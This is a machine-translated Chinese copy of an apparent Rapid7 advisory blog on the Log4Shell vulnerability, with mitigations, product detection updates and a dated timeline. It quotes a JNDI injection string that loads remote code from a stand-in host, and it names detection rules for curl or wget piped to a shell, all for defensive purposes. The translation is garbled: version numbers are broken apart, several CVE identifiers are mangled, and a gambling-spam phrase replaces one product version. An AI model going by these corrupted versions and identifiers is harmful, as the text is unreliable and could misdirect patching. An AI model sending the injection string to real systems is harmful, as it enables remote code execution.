最后更新于2023年12月1日(星期五)19:25:27 GMT

目录表

需要明确检测和减轻Log4j漏洞? Visit our Log4Shell资源中心.

Rapid7持续监控我们的环境,查找Log4Shell漏洞实例和利用尝试. 目前,我们还没有在我们的系统或解决方案中检测到任何成功的攻击企图. 有关我们对Log4Shell的内部响应的进一步信息和更新,请参阅我们的帖子 here.

有关此漏洞的信息和利用正在迅速发展. 一旦有进一步的信息,我们将更新这个博客.

Overview

CVE 供应商咨询 AttackerKB IVM内容 修补的紧迫性 最后一次更新
cve - 2021 - 44228 Apache咨询 AttackerKB 通过身份验证, remote, 和代理检查在InsightVM中可用, 以及容器安全评估. 立即(紧急) 2022年1月3日美国东部时间下午5:15

2021年12月6日,Apache released version 2.15.他们的Log4j框架,其中包括一个修复 cve - 2021 - 44228一个严重的(CVSSv3 10)远程代码执行(RCE)漏洞,影响Apache Log4j 2.14.1及更早版本. 该漏洞存在于Log4j处理器处理特制日志消息的方式中. 不受信任的字符串(如.g. 那些来自输入文本字段(例如web应用程序搜索框)的内容 $ {jndi: ldap: / /例子.com/a} 会触发远程类加载吗, 信息查询, 以及相关内容的执行(如果启用了消息查找替代). 2021年12月13日,Apache发布了Log4j 2.16.0,默认情况下不再启用消息文本内的查找

成功利用cve - 2021 - 44228可以允许远程, 未经身份验证的攻击者完全控制易受攻击的目标系统. cve - 2021 - 44228正在使用 broadly and 传统上 自2021年12月10日起在野外开采. 多个来源已经注意到针对此漏洞的扫描和利用尝试. Rapid7的研究人员已经开发并测试了一个针对最新Struts2 Showcase的概念验证漏洞.5.27)在Tomcat上运行. 我们预计攻击将继续并增加:防御者应尽快调用紧急缓解流程. 中钢协也发布了 an alert 建议立即缓解cve - 2021 - 44228.

大量的产品, frameworks, 和云服务实现Log4j, 哪个是流行的Java日志库. 组织应该为来自第三方软件生产者的持续的下游建议流做好准备,这些软件生产者在其依赖项中包含Log4j.

影响版本

根据 Apache的咨询, all Apache Log4j(版本2.X)版本最多2个.14.如果启用了消息查找替代,则1是脆弱的.

缓解和探测指南

安全团队和网络管理员应该更新到Log4j 2.17.立即调用0 emergency 修补程序和/或事件响应程序,以识别受影响的系统, products, 和组件,并以最高的紧迫性修复这一漏洞. 他们还应该监控web应用程序日志,以寻找从远程代码库执行方法的证据.e. 寻找 jndi:ldap 字符串)和正在执行的web应用服务器上的本地系统事件 curl 和其他已知的远程资源收集命令行程序. 此外, 我们建议密切关注提到Log4j的安全建议,并优先考虑这些解决方案的更新.

根据 Apache关于cve - 2021 - 44228的建议, 从版本2开始,允许利用该缺陷的行为在默认情况下已被禁用.15.0. Apache后来更新了他们的建议,指出cve - 2021 - 44228的修复在某些非默认配置中是不完整的. 已经发布了CVE-2021-45046来跟踪不完整的修复, 这两个漏洞在Log4j 2中都得到了缓解.16.0. 另一个拒绝服务(DoS)漏洞CVE-2021-45105后来在版本2中修复.17.0 of Log4j.

  • In releases >=2.这种行为可以通过设置system属性来减轻 log4j2.formatMsgNoLookups 或者环境变量 LOG4J_FORMAT_MSG_NO_LOOKUPS to true.
  • For releases >=2.7 and <=2.14.1, all PatternLayout 可以修改模式,将消息转换器指定为 % m {nolookups} 而不是 %m.
  • 从2开始释放.0- 9到2.10.0,缓解方法是从类路径中删除jndillookup类: -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

Java 8u121(参见 http://www.oracle.com/java/technologies/javase/8u121-relnotes.html)默认情况下对RCE进行保护 com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false.

根据… 翻译的技术博客文章JDK版本大于6u211、7u201、8u191和11.0.1不受LDAP攻击向量的影响. com.sun.jndi.ldap.object.trustURLCodebase is set to false,这意味着JNDI不能使用LDAP加载远程代码库. In Log4j releases >=2.这种行为可以通过设置系统属性来减轻 log4j2.formatMsgNoLookups to true 或者通过移除 JndiLookup 类从类路径(例如.g. -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). 默认情况下,Java 8u121防止RCE com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false. Rapid7的研究人员正在努力验证升级到更高版本的JDK/JRE是否能完全减轻攻击.

Rapid7实验室, 管理检测和响应(MDR), 和tCell团队建议过滤包含字符串"的入站请求。${jndi:,并监控所有应用程序和web服务器日志中的类似字符串.

紧急威胁实验室找到了 制作了Suricata和Snort IDS报道 查看已知的cve - 2021 - 44228漏洞利用路径.

研究人员正在维持 已知受影响的供应商产品和第三方建议的公开列表 与Log4j漏洞相关.

Rapid7客户

InsightVM和expose

[更新:美国东部时间2021年12月17日下午4:50]

身份验证和远程检查
InsightVM版本6.6.121支持在Linux和Windows系统上对Log4Shell进行身份验证扫描. 安装产品更新后,重新启动控制台和引擎.

  • Unix和Windows: apache log4j -核心cve - 2021 - 44228 验证漏洞检查对Linux和Windows系统上的Log4j的易受攻击版本执行完整的文件系统搜索. 扫描模板中必须启用Windows文件系统搜索功能,验证检查才能在Windows环境中运行.
  • Windows、Linux、Mac: apache log4j -核心cve - 2021 - 44228 -遥远 未经身份验证的漏洞检查试图触发回扫描引擎的连接以确定漏洞.

Version 6.6.121还包括禁用远程检查的功能.

代理检查
Insight Agent版本3.1.2.36 于2021年12月12日发布,包括对Log4j JAR文件的收集支持 Mac和Linux 系统,以便对cve - 2021 - 44228的身份验证检查的漏洞评估将适用于更新的启用代理的系统.

Insight Agent收集 Windows for Log4j从版本3开始推出.1.2.38,截至2021年12月17日. 完成这项工作需要几天时间.

  • 如果您正在使用Insight Agent来评估您的资产的漏洞,并且您还没有使用版本3.1.2.38、您可以取消选中“跳过代理执行的检查选项,以确保经过身份验证的检查在Windows系统上运行.
  • 如果您依赖Insight Agent进行漏洞管理, 考虑将Throttle级别设置为High(这是默认值),以确保尽快应用更新.

容器
使用容器安全性的InsightVM客户可以评估使用易受攻击的库版本构建的容器.

insighttidr和管理检测和响应

Rapid7 insighttidr有几个检测功能,可以识别攻击者使用的常见后续活动. 另外, 我们的团队正在审查我们的检测规则库,以确保我们根据事件响应(IR)看到的与此漏洞相关的任何观察到的攻击者行为进行检测。, MDR, 以及威胁情报和检测工程(TIDE)团队. 通过持续的合作和威胁形势监测, 我们确保产品覆盖被恶意行为者使用的最新技术.

  • [更新:美国东部时间2021年12月10日下午3:30]
    • 我们的威胁检测 & 响应团队已部署检测规则,以帮助识别与此漏洞相关的攻击者行为:
      • 攻击者技术- Curl或Wget到非标准端口的公共IP地址
      • 可疑进程- Curl或WGet管道输出到Shell
    • 我们还确定了一个现有的检测规则,它在识别漏洞之前提供了覆盖范围:
      • 可疑进程- Curl到外部IP地址
  • [更新:美国东部时间2021年12月10日下午7点]
    • 已经部署了一个额外的规则:
      • 攻击者技术- Curl或WGet到外部IP报告服务器IP在URL

伶盗龙

A 迅猛龙的工件 已经添加了可以用来搜索针对Log4j RCE漏洞的利用尝试的环境. A second 迅猛龙的工件 还添加了递归搜索易受攻击的Log4j库的功能.

tCell

随着下面的指导,我们的tCell团队有一个新的, 长篇博客文章 介绍这些检测以及如何使用它们来保护您的应用程序.

*新的*模式更新监控规则

对于tCell客户,我们已经更新了我们的AppFirewall模式来检测log4shell. 这意味着如果发生log4shell攻击,客户可以在tCell的应用程序防火墙功能中查看监控事件.

*新增*配置块规则的默认模式

为了保护您的应用程序免受任何Log4j漏洞的攻击,我们添加了一个默认模式(tc-cdmi-4) 供顾客阻挡. 下面是关于如何设置这个自定义块规则的视频(不要忘记部署!),或者如果您需要帮助,请联系tCell团队. 随着研究的继续和新模式的确定,它们将自动应用于 tc-cdmi-4 提高覆盖率.

识别易受攻击的软件包并启用OS命令

如果有的话,手机会提醒你的 脆弱的包 (such as CVE 2021 - 44228)由应用程序加载.

tCell客户也可以启用阻塞 操作系统命令. 这将防止大量利用curl、wget等漏洞的行为. 请注意, 对于那些拥有可执行程序的应用程序的客户, 确保你已经把它纳入了允许的政策, 然后启用阻塞.

InsightCloudSec

InsightCloudSec和InsightVM集成将识别易受InsightCloudSec cve - 2021 - 44228攻击的云实例. 客户可以使用ICS的上下文和丰富内容来识别向公众公开或附加到关键资源的实例.

应用两个Insight过滤器- 易受Log4Shell攻击的实例 and 公共子网上的实例易受Log4Shell攻击 -将能够识别公开暴露的易受攻击的资产和应用程序.

InsightCloudSec Log4J/Log4Shell漏洞过滤器

IntSights

IntSights研究人员 提供了一个视角 关注犯罪论坛上关于Log4Shell的情况,并将继续跟踪攻击者对这种新攻击向量的看法.

攻击和战役

Rapid7实验室现在正在维护一个 定期更新唯一Log4Shell漏洞字符串列表 正如Rapid7的海森堡项目所看到的那样.

Bitdefender详细介绍了 攻击者活动 使用Log4Shell利用Log4j. 他们的技术顾问指出,Muhstik僵尸网络, 和XMRIG miner已经将Log4Shell集成到它们的工具集中, 他们还看到Khonsari勒索软件家族适应使用Log4Shell代码.

外部资源

下面的资源不是由Rapid7维护的,但是可能对鉴别Log4j/Log4Shell暴露的团队有用.

CISA 现在维护受影响产品/服务的列表 当有新的信息可用时,它会被更新.

CISA也有 发布了一个专门的资源页面 主要针对联邦机构的Log4j信息, 但整合并包含将用于任何组织中的保护的信息.

ShadowServer是一个非营利组织,提供 向组织提供免费的Log4Shell公开报告.

NCSC国家实验室保持定期更新的列表 Log4j/Log4Shell分类和信息资源.

Updates

[美国东部时间2021年12月10日下午5:45]
Rapid7发布了一份技术分析 漏洞cve - 2021 - 44228.

[美国东部时间2021年12月11日上午11:15]
增加了额外的参考资源和小的说明.

[美国东部时间2021年12月11日下午4:30]
VMware已经 发表咨询意见 列出了30种易受cve - 2021 - 44228攻击的VMware产品, 包括vCenter Server, Horizon, 春云, Workspace ONE Access, vRealize运营经理, 及身份管理器. 他们的响应矩阵列出了可用的解决方案和补丁, 尽管大多数案件在12月11日之前都悬而未决.

Rapid7已经观察到来自研究社区的迹象,他们已经开始调查RCE在企业网络中关键位置的产品的可利用性, 包括vCenter Server等网络基础设施解决方案. VMware客户应该监控 this list 在发布补丁和解决方案时,在紧急情况下密切应用它们.

[美国东部时间2021年12月11日晚上10点]
Apache Struts 2存在cve - 2021 - 44228漏洞
Apache Struts 2框架包含静态文件(Javascript), CSS, 等),这些都是各种UI组件所需的. 查找和“提供”这些组件是由Struts 2类处理的 DefaultStaticContentLoader. The DefaultStaticContentLoader 存在Log4j漏洞cve - 2021 - 44228;
给定默认的静态内容, 基本上,所有Struts实现都应该非常容易受到攻击. Rapid7的漏洞研究团队有技术分析, 一个简单的概念验证, 还有一个日志工件示例 在ackerkb中提供.

[美国东部时间2021年12月12日下午2:20]
InsightVM和expose客户现在可以通过身份验证漏洞检查来评估他们对cve - 2021 - 44228的暴露程度. 请注意,此检查要求客户更新其产品版本并重新启动其控制台和引擎. See the Rapid7客户 节以了解详情.

[美国东部时间2021年12月13日上午10:30]
更新了缓解部分,包括Apache Log4J团队的新指导以及如何使用InsightCloudSec + InsightVM来帮助识别易受攻击的实例的信息.

[美国东部时间2021年12月13日下午2:40]
Rapid7研究人员已经证实并证明,基本上所有vCenter Server实例都可以被远程攻击者轻易利用, 未经身份验证的攻击者. 该矢量的技术分析、概念验证代码和折衷指标是 在ackerkb中提供.

[美国东部时间2021年12月13日下午4:00]
tCell客户现在可以在应用程序防火墙功能中查看log4shell攻击事件. 此外,客户还可以利用默认的tc-cdmi-4模式设置块规则.

[美国东部时间2021年12月13日下午6点]
我们收到了一些报告,当客户接受内容更新时,InsightVM的远程检查没有正确安装. 产品版本6.6.119号于12月13日被释放, 2021年美国东部时间下午6点,以确保cve - 2021 - 44228的远程检查可用且有效. 客户需要更新并重新启动扫描引擎/控制台.

[美国东部时间2021年12月13日晚上8:15]
关于Rapid7对Log4Shell的响应以及该漏洞对Rapid7解决方案和系统的影响的信息如下 现在可以在这里找到.

[美国东部时间2021年12月14日08:30]
Apache发布了Log4j 2.16. 默认情况下,这会禁用Java命名和目录接口(JNDI) log4j2.enableJndi 设置为true以允许JNDI. 它还完全取消了对消息查找的支持, 由先前的更新启动的进程. 它减轻了新发布版本中发现的弱点 cve - 22021 - 45046.

Rapid7已经发布了资源来帮助InsightVM和expose客户扫描此漏洞. This post, “使用InsightVM查找Apache Log4j cve - 2021 - 44228”详细介绍了扫描的工作原理,并包括用于报告的SQL查询. 对于产品帮助,我们增加了 文档 有关扫描和报告此漏洞的分步信息.

[美国东部时间2021年12月14日2:30]
除了Log4Shell,我们还有 cve - 2021 - 4104 -于2021年12月9日报告-版本1中Java日志库Apache Log4j的缺陷.x. 易受不可信数据反序列化的JMSAppender. 如果已部署的应用程序被配置为使用JMSAppender和攻击者的JMS Broker,那么远程攻击者就可以在服务器上执行代码. 注意,此缺陷仅影响专门配置为使用JMSAppender的应用程序, 哪个不是默认值, 或者攻击者对Log4j配置具有写访问权限,以便将JMSAppender添加到攻击者的JMS Broker.

[美国东部时间2021年12月14日3:30]
CISA has 发布了一个专门的资源页面 主要针对联邦机构的Log4j信息, 但整合并包含将用于任何组织中的保护的信息.

Rapid7实验室现在正在维护一个 定期更新唯一Log4Shell漏洞字符串列表 正如Rapid7的海森堡项目所看到的那样.

[美国东部时间2021年12月14日4:30]
增加了一节(上面)关于我们的inssights团队在犯罪论坛上看到的Log4Shell漏洞向量.

[美国东部时间2021年12月15日09:10]
增加了一个新的部分来跟踪活跃的攻击和战役. 请参阅上面有关将Log4Shell纳入其曲目的新勒索软件家族的详细信息.

[美国东部时间2021年12月15日10:00]
随着下面的指导,我们的tCell团队有一个新的, 长篇博客文章 介绍这些检测以及如何使用它们来保护您的应用程序.

[美国东部时间2021年12月15日下午6:30]
Apache在Log4j版本2中修复了一个额外的漏洞CVE-2021-45046.16.0来解决cve - 2021 - 44228在某些非默认配置中的不完整修复. Apache的安全公告现在建议用户必须升级到2.16.0以完全缓解cve - 2021 - 44228. InsightVM和expose客户可以通过身份验证(Linux)检查来评估他们对CVE-2021-45046的暴露程度.

Apache似乎也更新了他们的建议,提供了关于Log4j易受cve - 2021 - 44228攻击的单独版本流的信息. 他们已经在版本2中发布了针对该漏洞的修复程序.12.2和2一样.16.0. 我们正在调查InsightVM和expose覆盖这个附加版本流的可行性.

Version 6.6.InsightVM和expose客户现在可以使用扫描引擎和控制台的120版本,其中包括对cve - 2021 - 44228的认证Linux检查的改进.

[美国东部时间2021年12月17日09:30]
添加了一个“外部资源”部分,其中包括Log4j/Log4Shell上可能对客户和社区有用的非rapid7资源.

CVE-2021-45046已经从CVSS的3分升级.7 to 9.0 on the Apache基金会网站. 当cve - 2021 - 44228的修复程序“在某些非默认配置中不完整”变得很清楚时,该漏洞被指定,并且由于报告称它不仅允许DoS攻击,现在已经升级了严重程度, 但也有信息泄露,在某些特定情况下, RCE(目前是 macOS报告). 目前还没有公开报道这种RCE的野外开发. 解决这个问题的方法是Log4j 2.16更新于12月13日发布. 如果您尚未升级到此版本, 我们强烈建议您这样做, 虽然我们注意到,如果你在v2上.15 (Apache发布的原始修复),您将在大多数场景中得到覆盖. 更新至2.当你可以的时候,但不要因为你没有保险而惊慌.
当日志配置使用带有上下文查找的非默认模式布局时,CVE-2021-45046是一个问题. 在这种情况下, 控制线程上下文映射(MDC)输入数据的攻击者可以使用JNDI Lookup模式制作恶意输入数据.

[美国东部时间12月17日下午12:15]
从版本6开始.6.12月17日发布, 2021, 我们已经更新了产品功能,允许InsightVM和expose客户扫描Windows设备上的Apache Log4j (Log4Shell)漏洞,并进行cve - 2021 - 44228的身份验证检查. 此更新现在为客户提供了启用Windows文件系统搜索的选项,以允许扫描引擎搜索Windows资产上的特定文件的所有本地文件系统. 客户应该确保他们正在运行版本6.6.121的扫描引擎和控制台,并在扫描模板中启用Windows文件系统搜索. 更新到6.6.121需要重启.

注意:在Windows资产中搜索整个文件系统是一个密集的过程,可能会增加扫描时间和资源利用率. 允许这样做, 您可以在扫描模板中启用Windows文件系统搜索,以便在Windows系统上使用Log4j的身份验证检查.

在某些情况下, 在扫描模板中启用了“跳过代理执行的检查”选项的客户可能会看到扫描引擎跳过了经过身份验证的漏洞检查. 如果您的环境中运行了Insight Agent, 您可以取消勾选扫描模板中的“跳过代理执行的检查”选项,以确保在Windows系统上运行经过身份验证的检查.

[美国东部时间12月17日下午4:50]
针对Log4j的Windows上的Insight Agent收集已经开始在版本3中推出.1.2.38,截至2021年12月17日. 完成这项工作需要几天时间. 如果您正在使用Insight Agent来评估您的资产的漏洞,并且您还没有使用版本3.1.2.38、您可以取消选中“跳过代理执行的检查选项,以确保经过身份验证的检查在Windows系统上运行.

阅读更多关于扫描Log4Shell的信息 here.

[美国东部时间2021年12月17日下午6点]
勒索软件组织的报告不断出现, Conti, 利用cve - 2021 - 44228 (Log4Shell)发动攻击. 根据… report 从AdvIntel, 该组织正在测试利用,目标是VMware vCenter中脆弱的Log4j2实例,“直接从受感染的网络进行横向移动,导致vCenter访问影响美国和欧洲的受害者网络。.“预计未来几周还会出现更大规模的勒索攻击.

[美国东部时间2021年12月20日上午8:50]
在"外部资源" to 中钢协维护的受影响产品/服务清单.

[美国东部时间2021年12月20日下午1:30]
截至12月20日,InsightVM和expose客户可以评估其CVE-2021-45105的暴露程度, 2021年,通过身份验证的漏洞检查. CVE-2021-45105是一个拒绝服务(DoS)漏洞,已在Log4j版本2中修复.17.0. 我们在内部部署和代理扫描(包括Windows)中支持对此漏洞的检查。.
内容更新: ContentOnly-content-1.1.2361-202112201646
JarID: 3961186789

请注意,截至2021年12月17日,Apache的指导将更新到版本2.17.0 of Log4j. 虽然这是一个很好的指导,但考虑到原始cve - 2021 - 44228的严重性, 组织应该优先确保所有Log4j版本都已更新到至少2个.16.0.

[2021年12月22日]
Rapid7发布了一个新的带外注入攻击模板,用于在InsightAppSec中测试Log4Shell. 了解更多细节 here.

[2021年12月23日]
Apache发布了Log4j 2.12.Java 7用户3个,Java 7用户2个.3.为Java 6用户减轻log4shell相关漏洞. Notably, both Java 6 and Java 7 are end-of-life (EOL) and unsupported; we strongly recommend upgrading to Java 8 or later. 如果无法更新到受支持的Java版本,则应确保正在运行Log4j 2.12.3 or 2.3.1.

[2021年12月28日]
Apache has released Log4j版本2.17.1 (Java 8), 2.12.4 (Java 7)和2.3.2 (Java 6)以减轻新的漏洞. CVE-2021-44832是中等严重程度(CVSSv3 6).6)并且只存在于要求攻击者控制Log4j配置的非默认配置中. 这种情况极不可能发生. 应用程序通常不允许远程攻击者修改其日志配置文件. 而保持最新的Log4j版本通常是一个很好的策略, 组织不应该让CVE-2021-44832的过度炒作破坏他们通过确保cve - 2021 - 44228得到充分修复来降低实际风险的进展.

[2022年1月3日]
InsightVM和expose客户可以使用以下工具评估他们对Log4j CVE-2021-44832的暴露 验证漏洞检查 截至2021年12月31日. 请注意,正如我们上面强调的, 组织不应该让这个新的CVE, 哪一个明显被夸大了, 破坏缓解cve - 2021 - 44228的进程.

[2022年2月4日]

  • Log4j类文件删除缓解检测现在可用于基于Linux/ unix的环境.
  • 基于windows的远程检查偶尔失败的问题已经修复. 要支持这个新功能,需要更新到产品版本6.6.《pg电子游戏试玩》于2022年2月2日上映.
  • 覆盖范围已被添加 cve - 2021 - 4506 (在VMware Horizon Connection Server中发现的Log4j漏洞).


不要错过任何一个博客

获取有关安全的最新故事、专业知识和新闻.